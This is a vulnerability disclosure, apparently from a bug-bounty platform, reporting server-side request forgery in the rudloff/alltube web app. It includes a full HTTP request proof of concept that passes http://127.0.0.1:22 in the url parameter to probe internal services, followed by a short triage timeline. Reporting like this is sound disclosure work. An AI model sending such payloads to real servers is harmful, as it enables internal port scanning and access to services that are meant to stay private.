Server-Side Request Forgery (SSRF) in rudloff/alltube
Valid
Reported on Feb 26th 2022
Description
Alltube takes the URL from the url query parameter and uses it directly in the youtube-dl command. As a result, any unauthenticated attacker can perform an SSRF attack by passing internal hostnames in the URL parameter and obtain information about that service from the response.
Proof of Concept
GET /alltube/index.php/info?url=http://127.0.0.1:22 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/alltube/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close
Impact
This vulnerability allows internal port scanning, obtaining sensitive information about services on localhost, and sending requests to them.
Occurrences
We are processing your report and will contact the rudloff/alltube team within 24 hours.
3 months ago
We have contacted a member of the rudloff/alltube team and are waiting to hear back
3 months ago
Pierre Rudloff modified the report
3 months ago
The fix bounty has been dropped
DownloadController.php#L46 has been validated